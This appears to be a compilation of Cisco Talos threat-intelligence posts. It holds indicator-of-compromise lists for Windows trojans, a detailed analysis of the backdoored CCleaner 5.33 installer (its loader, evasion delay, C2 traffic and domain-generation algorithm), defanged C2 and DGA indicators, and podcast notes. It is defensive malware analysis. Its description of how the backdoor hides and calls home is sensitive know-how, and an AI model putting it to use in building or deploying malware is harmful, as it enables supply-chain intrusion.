• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUST\CRLs
• <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
• <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\CTLs
• <HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CTLs
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
• <HKCU>\Software\Microsoft\SystemCertificates\Root
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
• <HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUSTEDPEOPLE\CRLs
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\Certificates
• <HKCU>\Software\Microsoft\SystemCertificates\CA
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CTLs
• <HKCU>\Software\Microsoft\SystemCertificates\SmartCardRoot
• <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
• <HKLM>\System\CurrentControlSet\Services\EventLog\System\Schannel
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA\CTLs
• <HKLM>\Software\Wow6432Node\Microsoft\Tracing
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
• <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\TrustedPeople
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\ROOT\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUST\Certificates
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\AuthRoot
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
• <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA\Certificates
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\ROOT\CRLs
• <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\CA
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
• <HKCU>\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\CRLs
• <HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASMANCS
• <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
• <HKCU>\Software\Policies\Microsoft\SystemCertificates\trust
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CTLs
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUST\CTLs
• <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\Certificates
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
• <HKCU>\Software\Policies\Microsoft\SystemCertificates\Disallowed
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Disallowed
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUSTEDPEOPLE\Certificates
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\trust
• <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\CA
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\SMARTCARDROOT\CRLs
• <HKCU>\Software\Microsoft\SystemCertificates\TrustedPeople
• <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
• <HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\trust
• <HKCU>\Software\Microsoft\SystemCertificates\Disallowed
• <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CTLs
• <HKCU>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
• <HKLM>\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\TRUSTEDPEOPLE\CTLs

Mutexes

• Local\c:!users!administrator!appdata!local!microsoft!windows!history!history.ie5!
• Local\WininetConnectionMutex
• Local\_!MSFTHISTORY!_
• Local\ZonesLockedCacheCounterMutex
• RasPbFile
• Local\c:!users!administrator!appdata!local!microsoft!windows!temporary internet files!content.ie5!
• Local\ZonesCacheCounterMutex
• Local\WininetStartupMutex
• Local\WininetProxyRegistryMutex
• Local\c:!users!administrator!appdata!roaming!microsoft!windows!cookies!

IP Addresses

• 216[.]58[.]217[.]68
• 216[.]58[.]217[.]78
• 216[.]58[.]218[.]132
• 216[.]58[.]218[.]142
• 74[.]125[.]34[.]46

Domain Names

• www[.]virustotal[.]com
• google[.]com
• a6281279[.]yolox[.]net
• ghs-svc-https-c46[.]ghs-ssl[.]googlehosted[.]com
• www[.]google[.]com

Files and or directories created

• \DAV RPC SERVICE

File Hashes

• 0e9eeedbc7e293a83b9ebc3929b033e8c2061bdbacd8f17cd29b12505d2e777b
• 55acc591f5c6c0d2313ddd4ba47c25fe3b81bbcb64b4ad77c4668dfcc559748c
• e26c807c8e5d5ba8b41de497a24da81b8db0325a0a2c64bb04ee7beaae12904b
• 5554e16e209aec408f7f7ba49caff85e568de76a05ebe41cf74002a7ca35d973
• 8b20f9e78855218c693ade8a89b9c74487304df9bfdbcdbe8c65b05bfaa5b71b
• b001932b6938223033229e9d5bfbb5754680ab786c927396bb540e1a6db1ba7a
• 768ef3bae40d69715d2cfe3948fe3e9b0adb047525e8fa6d067269e859d0832b

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Trojan.Symmi-6336247-1

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{084FBB2E-F87B-4A87-B07B-817B5979A462}
• Value: Triggers
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
• Value: LoadAppInit_DLLs
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\HANDSHAKE\{340E7911-BE16-495F-BCFC-77C4B88E2E62}
• Value: data
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
• Value: aybbmte.job
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
• Value: aybbmte.job.fp
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
• Value: Collection
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{084FBB2E-F87B-4A87-B07B-817B5979A462}
• Value: DynamicInfo
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{084FBB2E-F87B-4A87-B07B-817B5979A462}
• Value: Path
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AYBBMTE
• Value: Index
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AYBBMTE
• Value: Id
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{084FBB2E-F87B-4A87-B07B-817B5979A462}
• Value: Hash
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
• Value: AppInit_DLLs
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\HANDSHAKE\{340E7911-BE16-495F-BCFC-77C4B88E2E62}

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %System32%\Tasks\aybbmte
• %AllUsersProfile%\Mozilla\thfirxd.exe
• %System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
• %AllUsersProfile%\Mozilla\lygbwac.dll

File Hashes

• 10e8f34991079b2c40f2e72babdbd3d0fd97703870552061752b341b704153b3
• 17ae6bd9e77a9a783caf5bc398f03ff47691134f9a6c5600a903159057c78b17
• 2a6794ad2014b95abca5512d85f748aaaf08a1d1f9a7be3583987bd1523f5f1b
• 2c0f383fcc3b07a893fa0ce0cfbe025d31c6ebfe46979b129bd8090712256c42
• 4395a481c0e8afbc60cd6bf4eef233bb2067485581a47e56ff310cb7466ee681
• 4763992ecb0dc5bbda30d2d00dd99927fb8aa2be759c9058f2dafb691ccf0f0b
• 54ac75db11197dc919f3574eefb88fe8b653de92ee5a6ed99cf00eb1b373d622
• 5542e1e52c63ceea56446d3c2f1f9c12adc60033d92289bb5d3450a40e02acd5
• 5917eb033004f3a29a3ac843f9c90844cab3cf0520e78e8739cc8cbfff83ef02
• 6c51d2e568f033b8a8c6764d54583da5af6fcec7a21d283e536063861c156ff4
• 7156221c0787b78866de2621828fa2ea48ebdba2b06219576337db8bf342c6cf
• 848993b12b05369d0873975aded55f837dc0a583c3839c05abe96bc4c3b68408
• 89c9a8a7f47bb27a175632ad48317b93fe8a2b59502c73371df48982168a70db
• 90e0adc73ca753d91fe32b1d3761c3f6f6e7216f3b77a87fdbe2a8e7f5e889fc
• 983f1a853f5f7f1c7aa2e687761ae736d2a4397884dfd455685bbc5ae1d0b2ef
• a6099ef0093736c0757c589890df229b39e4efbb38ebc63d460ea06186e09f69
• a94ef67587dde19950297b9b69e90254f16cd5e6653fc596524044377a2e1193
• c7fc560bff6d3fbc3a72355463836eaf9b3d7d18ade95ce72436926568626edc
• d6d82c71a400735446318832a57f7a2573cfa4073aa31ec6a8b742d43f93e9dd
• d778483fb3f3afdc4efd06ae0f605a53d7ee4e512459aa3b287cc246cc6097b5
• d8a3df456b94acea22b8ebeb4f7f860687dd6ab4ac2b687631b63342f7cbf927
• e5a8eba740a5acc1a6b5e11bb64be0be88a8556e48d78c292732048fa2c56003
• e76a23d8d8e16a6e1cd78e28ad875f5ca61221f3d0c44dddf750e5920dc5acc2
• e7eb60dd2d0830ae2d42a913afc5db98392a3d5846ef85ac32ec6fdd08b67fae
• fc30aafd75f5bcf3d4a73a6336ba1f2fb150a410712e32f5887d2afe8504f717

Coverage

Screenshots of Detection

AMP

ThreatGrid

This post was authored by: Edmund Brumaghin, Ross Gibb, Warren Mercer, Matthew Molyett, and Craig Williams

Update 9/18: CCleaner Cloud version 1.07.3191 is also reported to be affected

Introduction

 

Supply chain attacks are a very effective way to distribute malicious software into target organizations. This is because with supply chain attacks, the attackers are relying on the trust relationship between a manufacturer or supplier and a customer. This trust relationship is then abused to attack organizations and individuals and may be performed for a number of different reasons. The Nyetya worm that was released into the wild earlier in 2017 showed just how potent these types of attacks can be. Frequently, as with Nyetya, the initial infection vector can remain elusive for quite some time. Luckily with tools like AMP the additional visibility can usually help direct attention to the initial vector.

Talos recently observed a case where the download servers used by software vendor to distribute a legitimate software package were leveraged to deliver malware to unsuspecting victims. For a period of time, the legitimate signed version of CCleaner 5.33 being distributed by Avast also contained a multi-stage malware payload that rode on top of the installation of CCleaner. CCleaner boasted over 2 billion total downloads by November of 2016 with a growth rate of 5 million additional users per week. Given the potential damage that could be caused by a network of infected computers even a tiny fraction of this size we decided to move quickly. On September 13, 2017 Cisco Talos immediately notified Avast of our findings so that they could initiate appropriate response activities. The following sections will discuss the specific details regarding this attack.

Technical Details

 

CCleaner is an application that allows users to perform routine maintenance on their systems. It includes functionality such as cleaning of temporary files, analyzing the system to determine ways in which performance can be optimized and provides a more streamlined way to manage installed applications.

On September 13, 2017 while conducting customer beta testing of our new exploit detection technology, Cisco Talos identified a specific executable which was triggering our advanced malware protection systems. Upon closer inspection, the executable in question was the installer for CCleaner v5.33, which was being delivered to endpoints by the legitimate CCleaner download servers. Talos began initial analysis to determine what was causing this technology to flag CCleaner. We identified that even though the downloaded installation executable was signed using a valid digital signature issued to Piriform, CCleaner was not the only application that came with the download. During the installation of CCleaner 5.33, the 32-bit CCleaner binary that was included also contained a malicious payload that featured a Domain Generation Algorithm (DGA) as well as hardcoded Command and Control (C2) functionality. We confirmed that this malicious version of CCleaner was being hosted directly on CCleaner's download server as recently as September 11, 2017.

In reviewing the Version History page on the CCleaner download site, it appears that the affected version (5.33) was released on August 15, 2017. On September 12, 2017 version 5.34 was released. The version containing the malicious payload (5.33) was being distributed between these dates. This version was signed using a valid certificate that was issued to Piriform Ltd by Symantec and is valid through 10/10/2018. Piriform was the company that Avast recently acquired and was the original company who developed the CCleaner software application.

A second sample associated with this threat was discovered. This second sample was also signed using a valid digital certificate, however the signing timestamp was approximately 15 minutes after the initial sample was signed.

The presence of a valid digital signature on the malicious CCleaner binary may be indicative of a larger issue that resulted in portions of the development or signing process being compromised. Ideally this certificate should be revoked and untrusted moving forward. When generating a new cert care must be taken to ensure attackers have no foothold within the environment with which to compromise the new certificate. Only the incident response process can provide details regarding the scope of this issue and how to best address it.

Interestingly the following compilation artifact was found within the CCleaner binary that Talos analyzed:

        S:\workspace\ccleaner\branches\v5.33\bin\CCleaner\Release\CCleaner.pdb

Given the presence of this compilation artifact as well as the fact that the binary was digitally signed using a valid certificate issued to the software developer, it is likely that an external attacker compromised a portion of their development or build environment and leveraged that access to insert malware into the CCleaner build that was released and hosted by the organization. It is also possible that an insider with access to either the development or build environments within the organization intentionally included the malicious code or could have had an account (or similar) compromised which allowed an attacker to include the code.

It is also important to note that while previous versions of the CCleaner installer are currently still available on the download server, the version containing the malicious payloads has been removed and is no longer available.

Malware Installation and Operation

Within the 32-bit CCleaner v5.33 binary included with the legitimate CCleaner v5.33 installer, '__scrt_get_dyn_tls_init_callback' was modified to call to the code at CC_InfectionBase(0x0040102C). This was done to redirect code execution flow within the CCleaner binary to the malicious code prior to continuing with the normal CCleaner operations. The code that is called is responsible for decrypting data which contains the two stages of the malicious payload, a PIC (Position Independent Code) PE loader as well as a DLL file that effectively functions as the malware payload. The malware author had tried to reduce the detection of the malicious DLL by ensuring the IMAGE_DOS_HEADER was zeroed out, suggesting this attacker was trying to remain under the radar to normal detection techniques.

The binary then creates an executable heap using HeapCreate(HEAP_CREATE_ENABLE_EXECUTE,0,0). Space is then allocated to this new heap which is where the contents of the decrypted data containing the malware is copied. As the data is copied to the heap, the source data is erased. The PE loader is then called and begins its operation. Once the infection process has been initiated, the binary erases the memory regions that previously contained the PE loader and the DLL file, frees the previously allocated memory, destroys the heap and continues on with normal CCleaner operations.

The PE loader utilizes position independent coding practices in order to locate the DLL file within memory. It then maps the DLL into executable memory, calls the DLLEntryPoint to begin execution of the DLL being loaded and the CCleaner binary continues as normal. Once this occurs the malware begins its full execution, following the process outlined in the following sections.

CBkrdr.dll

The DLL file (CBkdr.dll) was modified in an attempt to evade detection and had the IMAGE_DOS_HEADER zeroed out. The DLLEntryPoint creates an execution thread so that control can be returned to the loader. This thread is responsible for calling CCBkdr_GetShellcodeFromC2AndCall. It also sets up a Return Oriented Programming (ROP) chain that is used to deallocate the memory associated with the DLL and exit the thread.

CCBkrdr_GetShellcodeFromC2AndCall

This function is responsible for much of the malicious operations that Talos observed while analyzing this malware. First, it records the current system time on the infected system. It then delays for 601 seconds before continuing operations, likely an attempt to evade automated analysis systems that are configured to execute samples for a predefined period of time or determine whether the malware is being executed in a debugger. In order to implement this delay functionality, the malware calls a function which attempts to ping 224.0.0.0 using a delay_in_seconds timeout set to 601 seconds. It then checks to determine the current system time to see if 600 seconds has elapsed. If that condition is not met, the malware terminates execution while the CCleaner binary continues normal operations. In situations where the malware is unable to execute IcmpCreateFile, it then falls back to using Sleep() to implement the same delay functionality. The malware also compares the current system time to the value stored in the following registry location:

        HKLM\SOFTWARE\Piriform\Agomo:TCID

If the value stored in TCID is in the future, the malware will also terminate execution.

The malware then checks to determine the privileges assigned to the user running on the system. If the current user running the malicious process is not an administrator the malware will terminate execution.

If the user executing the malware does have administrative privileges on the infected system, SeDebugPrivilege is enabled for the process. The malware then reads the value of 'InstallID' which is stored in the following registry location:

        HKLM\SOFTWARE\Piriform\Agomo:MUID

If this value does not exist, the malware creates it using '((rand()*rand() ^ GetTickCount())'.

Once the aforementioned activities have been performed, the malware then begins profiling the system and gathering system information which is later transmitted to the C2 server. System information is stored in the following data structure:

Once the system information has been collected, it is encrypted and then encoded using modified Base64. The malware then establishes a Command and Control (C2) channel as described in the following section.

Command and Control (C2)

While analyzing this malware, Talos identified what appears to be a software bug present in the malicious code related to the C2 function. The sample that Talos analyzed reads a DGA computed IP address located in the following registry location, but currently does nothing with it:

        HKLM\SOFTWARE\Piriform\Agomo:NID

It is unknown what the purpose of this IP address is at this time, as the malware does not appear to make use of it during subsequent operations. In any event, once the previously mentioned system information has been collected and prepared for transmission to the C2 server, the malware will then attempt to transmit it using an HTTPS POST request to 216[.]126[.]225[.]148. The HTTPS communications leverage a hardcoded HTTP Host header that is set to speccy[.]piriform[.]com, a legitimate platform which is also created by Piriform for hardware monitoring. This could make dynamic analysis more difficult as the domain would appear to be legitimate and perhaps even expected depending on the victim infrastructure. The requests also leverage HTTPS but ignore all security errors as the server currently returns a self-signed SSL certificate that was issued to the subdomain defined in the Host header field. In cases where no response is received from the C2 server, the malware then fails back to a Domain Generation Algorithm (DGA) as described in the section 'Domain Generation Algorithm' of this post.

Once a C2 server has been identified for use by the malware, it then sends the encoded data containing system profile information and stores the C2 IP address in the following registry location:

        HKLM\SOFTWARE\Piriform\Agomo:NID

The malware then stores the value of the current system time plus two days into the following registry location:

       HKLM\SOFTWARE\Piriform\Agomo:TCID

Data received from the C2 server is then validated to confirm that the received data is in the correct format for a CCBkdr_ShellCode_Payload structure. An example is shown below:

The malware then confirms that the value of EncryptedInstallID matches the value that was previously transmitted to the C2 server. It then allocates memory for the final shellcode payload. The payload is then decoded using modified Base64 and stored into the newly allocated memory region. It is then decrypted and called with the addresses of LoadLibraryA and GetProcAddress as parameters. Once the payload has been executed, the memory is deallocated and the following registry value is set to the current system time plus seven days:

        HKLM\SOFTWARE\Piriform\Agomo:TCID

The received buffer is then zeroed out and deallocated. The CCBkdr_ShellCode_Payload structure is also deallocated and the malware then continues with normal CCleaner operations. A diagram describing the high level operation of this malware is below:

Domain Generation Algorithm

In situations where the primary C2 server does not return a response to the HTTP POST request described in the previous section, the malware fails back to using a DGA algorithm. The algorithm used by this malware is time-based and can be calculated using the values of year and month. A list of DGA domains is below:
The malware will initiate DNS lookups for each domain generated by the DGA algorithm. If the DNS lookup does not result in the return of an IP address, this process will continue. The malware will perform a DNS query of the active DGA domain and expects that two IP addresses will be returned from the name server managing the DGA domain's namespace. The malware will then compute a secondary C2 server by performing a series of bit operations on the returned IP address values and combine them to determine the actual fallback C2 server address to use for subsequent C2 operations. A diagram showing this process is below:

Cisco Talos observed during analysis that the DGA domains had not been registered, so we registered and sinkholed them to prevent attackers from being able to use them for malicious purposes.

Potential Impact

The impact of this attack could be severe given the extremely high number of systems possibly affected. CCleaner claims to have over 2 billion downloads worldwide as of November 2016 and is reportedly adding new users at a rate of 5 million a week.

If even a small fraction of those systems were compromised an attacker could use them for any number of malicious purposes. Affected systems need to be restored to a state before August 15, 2017 or reinstalled. Users should also update to the latest available version of CCleaner to avoid infection. At the time of this writing that is version 5.34. It is important to note that according to the CCleaner download page, the free version of CCleaner does not provide automated updates, so this might be a manual process for affected users.

In analyzing DNS-based telemetry data related to this attack, Talos identified a significant number of systems making DNS requests attempting to resolve the domains associated with the aforementioned DGA domains. As these domains have never been registered, it is reasonable to conclude that the only conditions in which systems would be attempting to resolve the IP addresses associated with them is if they had been impacted by this malware. While most of the domains associated with this DGA have little to no request traffic associated with them, the domains related to the months of August and September (which correlates with when this threat was active in the wild) show significantly more activity.

Looking at the DNS related activity observed by Cisco Umbrella for the month of July 2017 (prior to CCleaner 5.33 being released) we observed very little in the way of DNS requests to resolve the IP address for DGA domain associated with this malware:

As mentioned earlier in this post, the version of CCleaner that included this malware was released on August 15, 2017. The following graph shows a significant increase in the amount of DNS activity associated with the DGA domain used in August 2017:

Likewise, the DGA domain associated with September 2017 reflects the following activity with regards to attempts to resolve the IP associated with it:

Note that in on September 1, 2017 it appears that the DNS activity shifted from the DGA domain previously used in August, to the one used in September, which matches the time-based DGA algorithm described in the "Domain Generation Algorithm" section of this blog post. After reaching out to Avast we noted that the server was taken down and became unavailable to already infected systems. As a result, we saw a significant increase in the amount of requests that were being directed at the failback DGA domains used by the malware.

It is also worth noting that at the time of this post, antivirus detection for this threat remains very low (The detections are at 1/64 at the time of this writing).

As part of our response to this threat, Cisco Talos has released comprehensive coverage to protect customers. Details related to this coverage can be found in the "Coverage" section of this post.

Conclusion

 

This is a prime example of the extent that attackers are willing to go through in their attempt to distribute malware to organizations and individuals around the world. By exploiting the trust relationship between software vendors and the users of their software, attackers can benefit from users' inherent trust in the files and web servers used to distribute updates. In many organizations data received from commonly software vendors rarely receives the same level of scrutiny as that which is applied to what is perceived as untrusted sources. Attackers have shown that they are willing to leverage this trust to distribute malware while remaining undetected. Cisco Talos continues to monitor all aspects of the threat landscape to quickly identify new and innovative techniques used by attackers to target organizations and individuals around the world.

Coverage

The following ClamAV signatures have been released to detect this threat: 6336251, 6336252.

Additional ways our customers can detect and block this threat are listed below.



Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS orWSA web scanning prevents access to malicious websites and detects malware used in these attacks.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Indicators of Compromise (IOCs)

File Hashes

6f7840c77f99049d788155c1351e1560b62b8ad18ad0e9adda8218b9f432f0a9
1a4a5123d7b2c534cb3e3168f7032cf9ebf38b9a2a97226d0fdb7933cf6030ff
36b36ee9515e0a60629d2c722b006b33e543dce1c8c2611053e0651a0bfdb2e9

DGA Domains

ab6d54340c1a[.]com
aba9a949bc1d[.]com
ab2da3d400c20[.]com
ab3520430c23[.]com
ab1c403220c27[.]com
ab1abad1d0c2a[.]com
ab8cee60c2d[.]com
ab1145b758c30[.]com
ab890e964c34[.]com
ab3d685a0c37[.]com
ab70a139cc3a[.]com

IP Addresses

216[.]126[.]225[.]148

Beers with Talos (BWT) Podcast Episode 13 is now available.  Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

Beers with Talos is a fast-paced, smart, and humorous podcast focused on security research topics. Staying abreast of security topics is difficult in this rapidly evolving threat landscape. Beers with Talos serves important security stories in a way that is understandable, engaging, and fun to researchers, executives, and security n00bs alike.

EP13 Show Notes: 

Struts - when to patch and when to patch with a vengeance. In light of the Equifax breach, we discuss how patching can make you live better days, Never look back and say, Could have been me. Naturally, that convo leads into the biggest story of the week around Pwning the Supply Chain - CCleaner, Python, and Nyetya style. Avast made some mistakes, but every tech company is susceptible to supply chain attacks. What can companies do to protect themselves and how can users adopt a stronger security posture in this area? We also talk Ex$ploit Economy - Valuing exploits by supply and demand. Zerodium has an extensive price list, what can we discern about the availability and difficulty of various exploits using basic economics?

EP13 Timetable:

01:00 - Roundtable - What’s on your mind today?
10:25 - Struts - Could Have Been Me (but we patched)
19:20 - CCleaning up the Supply Supply Chain
33:26 - The Ex$ploit Economy
53:28 - Closing shots and parting thoughts

Talos Struts post: http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html 
and http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html 
Talos CCleaner post: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html 
Zerodium exploit pricelist: https://www.zerodium.com/program.html
==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Find all episodes:
http://cs.co/talospodcast

Subscribe via iTunes (and leave a review!)
http://cs.co/talositunes

Check out the Talos Threat Research Blog:
http://cs.co/talosresearch

Subscribe to the Threat Source newsletter:
http://cs.co/talosupdate

Follow Talos on Twitter:
http://cs.co/talostwitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

This post was authored by Edmund Brumaghin, Earl Carter, Warren Mercer, Matthew Molyett, Matthew Olney, Paul Rascagneres and Craig Williams.

Note: This blog post discusses active research by Talos into a new threat. This information should be considered preliminary and will be updated as research continues.

Introduction

Talos recently published a technical analysis of a backdoor which was included with version 5.33 of the CCleaner application. During our investigation we were provided an archive containing files that were stored on the C2 server. Initially, we had concerns about the legitimacy of the files. However, we were able to quickly verify that the files were very likely genuine based upon the web server configuration files and the fact that our research activity was reflected in the contents of the MySQL database included in the archived files.

In analyzing the delivery code from the C2 server, what immediately stands out is a list of organizations, including Cisco, that were specifically targeted through delivery of a second-stage loader. Based on a review of the C2 tracking database, which only covers four days in September, we can confirm that at least 20 victim machines were served specialized secondary payloads. Below is a list of domains the attackers were attempting to target.


Interestingly the array specified contains Cisco's domain (cisco.com) along with other high-profile technology companies. This would suggest a very focused actor after valuable intellectual property.

